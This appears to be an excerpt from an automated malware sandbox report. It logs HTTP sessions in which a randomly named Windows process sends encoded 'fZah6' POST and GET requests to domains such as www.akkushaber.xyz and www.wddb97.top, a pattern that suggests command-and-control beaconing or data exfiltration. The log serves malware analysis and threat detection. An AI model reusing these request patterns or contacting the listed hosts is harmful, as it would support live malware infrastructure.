2b 33 36 71 79 45 46 58 75 31 75 4d 43 4e 78 46 76 41 79 68 4f 2f 2f 4e 35 39 68 4c 32 6e 39 71 37 74 4a 2b 4b 78 42 57 66 77 67 77 55 72 53 79 2b 4a 59 41 58 7a 56 31 48 48 76 62 7a 32 4a 6c 70 42 7a 48 46 4a 71 62 4a 61 4e 39 32 4a 41 6d 5a 66 48 69 46 53 49 31 48 66 4e 74 6c 75 48 53 33 38 3d Data Ascii: fZah6=+3ZxJ8fKcZP+c7pxJnDf6TFplWMQPnHe1H19AZIeVoOdYodtuGgVVEyKQReqfWBeZGSfOnnL2sDAGgletc6GkMWg4LBMRWvbuzgjkz8V4G5figaVImWTq+36qyEFXu1uMCNxFvAyhO//N59hL2n9q7tJ+KxBWfwgwUrSy+JYAXzV1HHvbz2JlpBzHFJqbJaN92JAmZfHiFSI1HfNtluHS38=
Nov 11, 2024 06:53:46.264085054 CET	1236	IN	HTTP/1.1 302 Found Date: Mon, 11 Nov 2024 05:53:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://lirik.xyz/ cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=me1TCDwzWe61xhbnPJdlQ3ekle6UQZ%2BdMNRxyk6HJLiYDOB6PlKde2fw4EMLFBc8UXa4TI6lkQTQcn9QlcLzsHQ7seUDD%2BaSQXYmF6m6oU24o0FfHlpKlHufznE75QJjYppqAHQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c0616cebf5e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1346&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=801&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 [TRUNCATED] Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; ma
Nov 11, 2024 06:53:46.264106989 CET	293	IN	Data Raw: 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 Data Ascii: rgin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been tempora

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50064	172.67.217.176	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:48.243124962 CET	10883	OUT	POST /x784/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.akkushaber.xyz Origin: http://www.akkushaber.xyz Referer: http://www.akkushaber.xyz/x784/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 2b 33 5a 78 4a 38 66 4b 63 5a 50 2b 63 37 70 78 4a 6e 44 66 36 54 46 70 6c 57 4d 51 50 6e 48 65 31 48 31 39 41 5a 49 65 56 72 75 64 59 65 4a 74 38 31 34 56 55 45 79 4b 64 78 65 6e 66 57 42 50 5a 47 61 62 4f 6e 62 31 32 76 37 41 48 44 64 65 72 70 4f 47 75 4d 57 67 33 72 42 4a 66 32 76 4f 75 33 45 34 6b 33 59 56 34 47 35 66 69 6d 2b 56 63 46 4f 54 35 75 33 39 36 43 45 42 61 4f 31 56 4d 43 6c 68 46 76 30 45 67 39 6e 2f 4e 5a 74 68 62 55 2f 39 6f 62 74 4c 35 4b 78 5a 57 66 4d 2f 77 55 6e 65 79 2f 39 2b 41 52 50 56 32 57 65 35 47 41 33 54 78 36 42 71 48 46 74 41 53 4b 72 4e 39 6b 4a 55 6e 72 72 72 68 31 47 71 37 67 36 63 2f 77 47 47 44 67 49 61 45 49 59 62 5a 39 6d 47 55 68 76 56 32 43 65 65 66 48 6c 4d 75 75 35 75 36 61 77 5a 5a 2b 55 74 36 56 66 38 75 49 6d 34 2f 50 41 64 30 65 49 43 33 49 48 73 48 66 63 55 75 5a 6e 78 69 79 73 73 38 69 30 6c 32 41 64 52 5a 42 62 70 7a 6e 42 62 57 58 77 30 6d 69 34 5a 69 77 63 36 4e 6a 52 6e 56 76 73 4a 6f 59 74 56 41 55 6d 52 68 51 65 59 37 63 32 51 [TRUNCATED] Data Ascii: fZah6=+3ZxJ8fKcZP+c7pxJnDf6TFplWMQPnHe1H19AZIeVrudYeJt814VUEyKdxenfWBPZGabOnb12v7AHDderpOGuMWg3rBJf2vOu3E4k3YV4G5fim+VcFOT5u396CEBaO1VMClhFv0Eg9n/NZthbU/9obtL5KxZWfM/wUney/9+ARPV2We5GA3Tx6BqHFtASKrN9kJUnrrrh1Gq7g6c/wGGDgIaEIYbZ9mGUhvV2CeefHlMuu5u6awZZ+Ut6Vf8uIm4/PAd0eIC3IHsHfcUuZnxiyss8i0l2AdRZBbpznBbWXw0mi4Ziwc6NjRnVvsJoYtVAUmRhQeY7c2Qis8+M70clXF9iW9E+rLfv72XpeMQtZx90qgYRpOxqHsGyZSGOhywu4TzCVxcFDCK1kV5fi5/BvBF1KIc52p49R9uE3Cc9NToWlnXvdEMvSbpnOxXyKPZAEcY6DfpExv+ul7D3x826dzVZWpCnEjwmPNSTviLvHCRGHdENhuYfulUmPEdYEwXG2PaFzlVhjx10OL0ePGHGenXI61bAdwAkBtwZ+C9netT/X4v1qcIlqaVT+4w8cKGT0g2D+jQCGysHxiAAJy3dP51SlJrPzdFPnOos+xb22WZT6rquILzwVPr0QX+RjXaQpbr21f9qLtiTDAHhxx5TNsG/mIHE+jeIJN14xc2d6cxjWyCKf31sI34CvvjiFDIhInNiO0qqaki9aE4zufjgKW3y6XwxrezVtKOWBFxQoxC0MA2L7NaoF4SFaeynV1n7t/JTi4nOXDEgyryFVUGbXKzWJKdEMrmJoml9Dp/uu5i/EM+mrZQBTXLdUYgeGal6xCqhJpLnMkwPpeElMWzMFiOyBvdr0tMMJYbS5GH9f2IMZitWA3UzzWQqf8qKvJSX4sHaTFZ8EpksAMVTlV4mcQFbXrQsbUHYjunV3TzoO/OLqj6pf8KBE5lCVWJZc19QZX/q9fYZdKSIeqc9cJWVW69IYZ/NaVVN+/F1aLW3EjHrO [TRUNCATED]
Nov 11, 2024 06:53:48.808856964 CET	1236	IN	HTTP/1.1 302 Found Date: Mon, 11 Nov 2024 05:53:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://lirik.xyz/ cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MXjYq1gM%2FT6x6etTYKx8H8mqKvgvJxi9OGQF6HsYNzfm0%2B3VoT3zGU2TQDlYyPJuRjOEpd4%2BQ0YM3%2FOAvH1dzlXBikb80mCCLZDoEmlf5P4E%2Fx%2B2vHdMdtfCTHeIzsU86zB2t2Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c0626bd5143fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1031&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10883&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 [TRUNCATED] Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; widt
Nov 11, 2024 06:53:48.808878899 CET	304	IN	Data Raw: 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 Data Ascii: h:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50065	172.67.217.176	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:50.787039042 CET	523	OUT	GET /x784/?42T8f=ABwh0lAHdJnXMBd&fZah6=z1xRKJbVI4qWZJYuN3/Y1QlPgxFzBlHz+yp8GvsKYYCXapov62MLDH6IViKuZ3c2V3KnFmbn4PDNDh0fz7SuvPnX+7QhQmDMmkdFhT0O1l19tgipO3DZ86o= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.akkushaber.xyz User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:53:51.371902943 CET	1236	IN	HTTP/1.1 302 Found Date: Mon, 11 Nov 2024 05:53:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://lirik.xyz/ cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbo8%2BXIEhLrBkKDrn34FJmPWkYKI%2FvpZ3fQjuT%2BSGGNM2uf0YyimgpotOrypSCIV5MJ7DMSvJo91ze%2BnFEQTALW%2BI42dLfhnv4lyNVfmgDzaCg%2Bmq3uVmvMjm%2BCL81gzG4jFLSE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c0636b9aa439f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 [TRUNCATED] Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:
Nov 11, 2024 06:53:51.371929884 CET	302	IN	Data Raw: 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 Data Ascii: 800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has bee

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50066	206.119.82.172	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:56.730901003 CET	769	OUT	POST /cjue/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.wddb97.top Origin: http://www.wddb97.top Referer: http://www.wddb97.top/cjue/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 77 4e 36 49 50 61 2f 49 52 64 43 30 34 59 76 2f 61 43 2b 52 6e 6c 2f 4c 43 6c 4e 50 75 53 48 38 46 79 51 35 44 70 73 67 6b 33 37 52 35 2f 4a 32 72 64 39 68 51 4c 36 48 4f 4c 6a 5a 61 75 38 59 32 6f 38 49 6d 5a 78 69 70 57 42 52 71 63 54 77 35 61 4e 6f 62 61 44 46 65 6d 7a 6f 6a 79 4c 68 31 54 6a 48 43 53 53 59 51 4e 73 41 45 68 31 55 4d 63 6a 68 2f 74 35 77 75 74 50 42 2b 36 2f 53 63 4e 44 43 47 57 4d 71 2f 6e 70 6e 57 65 45 34 77 5a 58 32 71 37 63 67 2b 48 61 78 2f 2f 33 4e 33 39 39 52 43 35 38 38 58 35 44 61 30 57 2f 50 31 69 47 53 75 4a 35 71 2b 79 77 30 48 36 6e 72 6e 51 3d 3d Data Ascii: fZah6=wN6IPa/IRdC04Yv/aC+Rnl/LClNPuSH8FyQ5Dpsgk37R5/J2rd9hQL6HOLjZau8Y2o8ImZxipWBRqcTw5aNobaDFemzojyLh1TjHCSSYQNsAEh1UMcjh/t5wutPB+6/ScNDCGWMq/npnWeE4wZX2q7cg+Hax//3N399RC588X5Da0W/P1iGSuJ5q+yw0H6nrnQ==
Nov 11, 2024 06:53:57.530672073 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:57 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50067	206.119.82.172	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:59.271838903 CET	789	OUT	POST /cjue/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.wddb97.top Origin: http://www.wddb97.top Referer: http://www.wddb97.top/cjue/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 77 4e 36 49 50 61 2f 49 52 64 43 30 2b 34 2f 2f 58 44 2b 52 73 6c 2f 4b 48 6c 4e 50 6b 79 47 31 46 79 4d 35 44 6f 6f 77 6e 42 72 52 35 65 35 32 71 59 52 68 56 4c 36 48 57 37 6a 59 56 4f 38 54 32 6f 67 75 6d 63 78 69 70 57 46 52 71 65 4c 77 35 71 78 6e 42 71 44 39 53 47 7a 71 6e 79 4c 68 31 54 6a 48 43 53 75 79 51 4a 41 41 44 52 46 55 50 2b 48 75 31 4e 35 7a 70 74 50 42 36 36 2b 62 63 4e 44 77 47 58 68 50 2f 68 6c 6e 57 62 67 34 78 4c 2f 70 67 37 63 6d 7a 6e 62 31 2b 4b 54 47 2f 73 45 39 46 2b 41 6d 55 59 66 2b 38 77 79 56 6b 54 6e 46 38 4a 64 5a 6a 31 35 41 4b 35 61 69 38 5a 79 65 43 65 54 75 6a 50 4a 65 36 78 41 6c 73 6c 2f 64 47 59 77 3d Data Ascii: fZah6=wN6IPa/IRdC0+4//XD+Rsl/KHlNPkyG1FyM5DoownBrR5e52qYRhVL6HW7jYVO8T2ogumcxipWFRqeLw5qxnBqD9SGzqnyLh1TjHCSuyQJAADRFUP+Hu1N5zptPB66+bcNDwGXhP/hlnWbg4xL/pg7cmznb1+KTG/sE9F+AmUYf+8wyVkTnF8JdZj15AK5ai8ZyeCeTujPJe6xAlsl/dGYw=
Nov 11, 2024 06:54:00.069432974 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:59 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50068	206.119.82.172	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:54:01.817315102 CET	10871	OUT	POST /cjue/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.wddb97.top Origin: http://www.wddb97.top Referer: http://www.wddb97.top/cjue/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 77 4e 36 49 50 61 2f 49 52 64 43 30 2b 34 2f 2f 58 44 2b 52 73 6c 2f 4b 48 6c 4e 50 6b 79 47 31 46 79 4d 35 44 6f 6f 77 6e 42 6a 52 34 70 52 32 72 37 70 68 57 4c 36 48 49 4c 6a 56 56 4f 38 4b 32 6f 34 71 6d 63 31 79 70 55 4e 52 70 37 58 77 77 35 70 6e 50 61 44 39 61 6d 7a 6e 6a 79 4c 4f 31 51 62 62 43 55 4f 79 51 4a 41 41 44 53 64 55 62 63 6a 75 6d 64 35 77 75 74 50 33 2b 36 2f 2b 63 4e 4c 4b 47 58 56 31 2b 52 46 6e 57 37 77 34 38 59 58 70 36 37 63 6b 77 6e 62 54 2b 4b 57 65 2f 73 59 48 46 37 55 59 55 59 37 2b 34 6b 66 55 31 6e 6a 34 6a 71 56 49 31 55 68 36 50 72 79 52 34 4b 79 46 48 50 58 31 39 71 70 38 78 78 39 56 34 6c 58 34 55 64 79 37 73 38 6e 4b 35 2b 54 56 58 45 4e 52 57 55 47 39 46 48 61 6c 63 68 79 49 48 4e 79 78 6e 63 4c 71 78 79 59 63 46 50 58 41 6c 79 32 4d 4a 65 70 35 4b 38 68 70 49 65 45 79 38 66 6e 58 70 75 7a 44 78 2b 47 63 42 48 71 6f 43 6d 70 45 73 61 4a 77 36 6c 45 70 53 6e 50 72 70 66 56 44 4e 33 6e 6d 53 73 69 67 78 57 4b 61 4e 47 41 39 52 2f 43 35 51 57 2b 6c [TRUNCATED] Data Ascii: fZah6=wN6IPa/IRdC0+4//XD+Rsl/KHlNPkyG1FyM5DoownBjR4pR2r7phWL6HILjVVO8K2o4qmc1ypUNRp7Xww5pnPaD9amznjyLO1QbbCUOyQJAADSdUbcjumd5wutP3+6/+cNLKGXV1+RFnW7w48YXp67ckwnbT+KWe/sYHF7UYUY7+4kfU1nj4jqVI1Uh6PryR4KyFHPX19qp8xx9V4lX4Udy7s8nK5+TVXENRWUG9FHalchyIHNyxncLqxyYcFPXAly2MJep5K8hpIeEy8fnXpuzDx+GcBHqoCmpEsaJw6lEpSnPrpfVDN3nmSsigxWKaNGA9R/C5QW+lS3AvYcv1/+K2wDFE4R0Np8aM3WXFbsXlUqgckK+dGKGpM2s2SWx9xrD92ZgLU76q/5VvpmSygCUo32395IaDU4zEoVFFLK7900V1PGKFoUZupj4/fqg+kvosEX90+lVvhNA4mUrsFiFTQnqBpu1PPMr8ArL90wXwlViJzIfoSmka1RbRnqUD5wSW71DGg3SKDGplQMEzD4RwWKoTIglSE/7J6R7jrCZUmUFNs5GtoWPOfKhXVKLzsJlVzN9+Lv8ZZxluuPQP2z4tF7V0Vv4LzuZLkc6eVyKSylTSxCCuxqYIlFQzAeEY9rU6hvzbraeIXXqJms0/JbEFMbe4CiarpJgsJ6buEov5X7bOOMpfJAggzjaonlvZtDKfJWRiwotKeb1EMC6Ome9hBTRRP+qFyzL7rUoCftY3KQUeWx6ID9rLiJ1mce/1yTsKMz+cm9v8MaxMunLMbtgrlm6ZHO+bRoeK3vLnalpMijlaUnJAEFJ0TMv//u5PFeor3/3J75Vu1WKUdgwEftxsHI0jCPqwC28ym/Bdx5m15nJr53W9h1my9ngl50Ts7rmZ/QUgVKGr8pPpVccQcxGypXg/cCVZ/y42TkZlQXaPBBp6MEia4DPlDvDOQeopebwl6H4L3GWLAkR42uLJrf2E5ACl4Bqek1RPNKw6kwQY/A [TRUNCATED]
